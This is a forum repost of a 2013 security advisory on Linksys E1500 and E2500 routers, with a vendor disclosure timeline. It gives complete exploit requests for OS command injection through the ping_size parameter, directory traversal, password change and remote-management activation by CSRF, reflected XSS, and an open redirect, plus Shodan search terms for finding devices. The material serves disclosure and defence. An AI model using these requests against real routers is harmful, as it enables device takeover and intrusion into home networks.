Praetorian503 Posted February 6, 2013 Report Posted February 6, 2013 Linksys models E1500 and E2500 suffer from cross site request forgery, cross site scripting, OS command injection, and directory traversal vulnerabilities.Device Name: Linksys E1500 / E2500Vendor: Linksys============ Device Description: ============The Linksys E1500 is a Wireless-N Router with SpeedBoost. It lets you access the Internet via a wireless connection or through one of its four switched ports. You can also use the Linksys E1500 to share resources, such as computers, printers and files.The installation and use of the Linksys E1500 is easy with Cisco Connect, the software that is installed when you run the Setup CD. Likewise, advanced configuration of the Linksys E1500 is available through its web-based setup page.Source: http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=...============ Vulnerable Firmware Releases - e1500: ============Firmware-Version: v1.0.00 - build 9 Feb. 17, 2011Firmware-Version: v1.0.04 - build 2 Mär. 8, 2012Firmware-Version: v1.0.05 - build 1 Aug. 23, 2012============ Vulnerable Firmware Releases - e2500: ============Firmware Version: v1.0.03 (only tested for known OS command injection)Other versions may also be affected.============ Shodan Torks ============Shodan Search: linksys e1500Shodan Search: linksys e2500============ Vulnerability Overview: ============ * OS Command Injection / E1500 and E2500 v1.0.03 => Parameter: ping_size=%26ping%20192%2e168%2e178%2e102%26The vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to start a telnetd or upload and execute a backdoor to compromise the device.You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.Example Exploit:POST /apply.cgi HTTP/1.1Host: 192.168.178.199User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateProxy-Connection: keep-aliveReferer: http://192.168.178.199/Diagnostics.aspAuthorization: Basic xxxxContent-Type: application/x-www-form-urlencodedContent-Length: 185Connection: closesubmit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26ping%20192%2e168%2e178%2e102%26&ping_times=5&traceroute_ip=Change the request methode from HTTP Post to HTTP GET makes the exploitation easier:http://192.168.178.199/apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26COMMAND%26&ping_times=5&traceroute_ip=Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-os-command-injection-1.0.05-rooted.png * Directory traversal - tested on E1500: => parameter: next_pageAccess local files of the device. You need to be authenticated or you have to find other methods for accessing the device.Request:POST /apply.cgi HTTP/1.1Host: 192.168.178.199User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateProxy-Connection: keep-aliveReferer: http://192.168.178.199/Wireless_Basic.aspAuthorization: Basic YWRtaW46YWRtaW4=Content-Type: application/x-www-form-urlencodedContent-Length: 75submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/versionResponse:HTTP/1.1 200 OkServer: httpdDate: Thu, 01 Jan 1970 00:00:29 GMTCache-Control: no-cachePragma: no-cacheExpires: 0Content-Type: text/htmlConnection: closeLinux version 2.6.22 (cjc@t.sw3) (gcc version 4.2.3) #10 Thu Aug 23 11:16:42 HKT 2012Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-dir-traversal.png * For changing the current password there is no request of the current password - tested on E1500 With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.Example Request:POST /apply.cgi HTTP/1.1Host: 192.168.1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateProxy-Connection: keep-aliveReferer: http://192.168.1.1/Management.aspAuthorization: Basic xxxxContent-Type: application/x-www-form-urlencodedContent-Length: 311submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0 * CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management - tested on E1500: http://<IP>/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=password1&http_passwdConfirm=password1&_http_enable=1&web_wl_filter=0&remote_management=1&_remote_mgt_https=1&remote_upgrade=0&remote_ip_any=1&http_wanport=8080&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0 * Reflected Cross Site Scripting - tested on E1500 => Parameter: wait_time=3'%3balert('pwnd')//Injecting scripts into the parameter wait_time reveals that this parameter is not properly validated for malicious input.Example Exploit:POST /apply.cgi HTTP/1.1Host: 192.168.178.199User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateProxy-Connection: keep-aliveReferer: http://192.168.178.199/Wireless_Basic.aspAuthorization: Basic xxxxContent-Type: application/x-www-form-urlencodedContent-Length: 300submit_button=Wireless_Basic&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3'%3balert('pwnd')//&guest_ssid=Cisco-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco&_wl0_nbw=20&_wl0_channel=0&closed_24g=0Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-XSS.png * Redirection - tested on E1500 => Paramter: submit_button=http://www.pwnd.pwnd%0aInjecting URLs into the parameter submit_button reveals that this parameter is not properly validated for malicious input.Example Exploit:POST /apply.cgi HTTP/1.1Host: 192.168.178.199User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateProxy-Connection: keep-aliveReferer: http://192.168.178.199/Wireless_Basic.aspAuthorization: Basic xxxxContent-Type: application/x-www-form-urlencodedContent-Length: 290submit_button=http://www.pwnd.pwnd%0a&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3&guest_ssid=Cisco01589-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco01589&_wl0_nbw=20&_wl0_channel=0&closed_24g=0Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-redirect.png============ Solution ============No known solution available.============ Credits ============The vulnerability was discovered by Michael MessnerMail: devnull#at#s3cur1ty#dot#deWeb: http://www.s3cur1ty.deAdvisory URL: http://www.s3cur1ty.de/m1adv2013-004Twitter: @s3cur1ty_de============ Time Line: ============October 2012 - discovered vulnerability21.10.2012 - contacted Linksys with vulnerability details23.10.2012 - Linksys requestet to check new firmware v1.0.05 build 127.10.2012 - Tested and verified all vulnerabilities in release v1.0.05 build 127.10.2012 - contacted Linksys with vulnerabilty details in release v1.0.05 build 129.10.2012 - Linksys responded with case number13.11.2012 - /me requested update of the progress15.11.2012 - Linksys sends Beta Agreement16.11.2012 - Linksys sends the Beta Firmware for testing16.11.2012 - tested Beta version18.11.2012 - informed Linksys about the results30.11.2012 - reported the same OS Command injection vulnerability in model E250010.12.2012 - /me requested update of the progress23.12.2012 - Update to Linksys with directory traversal vulnerability09.01.2013 - Case closed05.02.2013 - public release===================== Advisory end =====================Source: PacketStorm Quote